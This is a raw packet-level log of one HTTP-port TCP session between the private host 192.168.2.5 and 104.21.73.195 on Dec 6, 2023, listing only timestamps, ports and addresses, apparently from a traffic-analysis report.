                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.849447012 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.849459887 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.849477053 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.849484921 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.849550962 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.849564075 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.849576950 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.849582911 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.849615097 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850097895 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850111961 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850146055 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850183010 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850231886 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850244045 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850255966 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850261927 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850285053 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850287914 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850307941 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850337029 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850363016 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850374937 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850395918 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850404024 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850426912 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850439072 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850459099 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850481033 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850492954 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850512028 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850558996 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850570917 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850590944 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850614071 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.850663900 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851128101 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851164103 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851176023 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851197004 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851208925 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851239920 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851264000 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851275921 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851288080 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851308107 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851361990 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851376057 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851387978 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851396084 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851398945 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851412058 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851421118 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851448059 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851470947 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851536036 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851567984 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851571083 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851612091 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.851644039 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852108002 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852121115 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852133989 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852157116 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852178097 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852210999 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852221966 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852235079 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852263927 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852289915 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852339029 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852351904 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852371931 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852405071 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852441072 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852466106 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852504969 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852515936 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852528095 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852534056 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852556944 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852596045 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852607965 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.852639914 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853034019 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853074074 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853094101 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853106976 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853108883 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853118896 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853142023 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853147984 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853172064 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853193045 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853204966 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853234053 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853239059 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853251934 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853276014 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853281975 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853310108 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853321075 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853342056 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853359938 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853391886 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853410006 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853421926 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853446960 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853934050 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853945971 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853979111 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.853980064 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854041100 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854054928 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854070902 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854075909 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854088068 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854099035 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854104042 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854120970 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854130983 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854167938 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854181051 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854201078 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854228020 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854257107 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854279041 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854290962 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854301929 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854312897 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854321957 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854336977 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854851961 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854882956 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854896069 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854926109 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854950905 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.854980946 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855005026 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855016947 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855029106 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855048895 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855051041 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855072021 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855086088 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855175972 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855189085 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855201006 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855207920 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855232000 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855241060 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855252981 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855264902 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855277061 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855278969 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855335951 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855803013 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855815887 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855876923 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855894089 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855906010 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855928898 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855942011 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855967999 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855979919 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.855998993 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856029987 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856041908 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856053114 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856060982 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856086016 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856110096 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856122971 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856154919 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856169939 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856183052 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856210947 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856245041 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856256962 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856268883 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856280088 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856286049 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856314898 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856842995 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856878996 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856892109 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856904984 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856915951 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856930971 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856935024 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.856991053 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857003927 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857011080 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857086897 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857089043 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857100964 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857122898 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857140064 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857192039 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857222080 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857224941 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857292891 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857305050 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857316971 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857323885 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857347965 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857758045 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857770920 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857812881 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857824087 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857836008 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857867002 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857888937 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857901096 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857913017 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857929945 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857938051 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857961893 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857963085 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.857983112 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858016014 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858074903 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858088017 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858099937 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858110905 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858124971 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858139992 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858170033 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858182907 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858222008 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858730078 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858766079 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858804941 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858807087 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858845949 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858858109 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858881950 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858916044 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858927965 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858951092 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858973980 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858985901 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.858997107 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859008074 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859029055 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859034061 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859040976 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859051943 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859064102 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859075069 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859076023 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859102964 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859144926 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859180927 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859752893 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859797001 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859808922 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859832048 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859864950 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859896898 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859903097 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859925985 CET8049706104.21.73.195192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:03.859939098 CET8049706104.21.73.195192.168.2.5
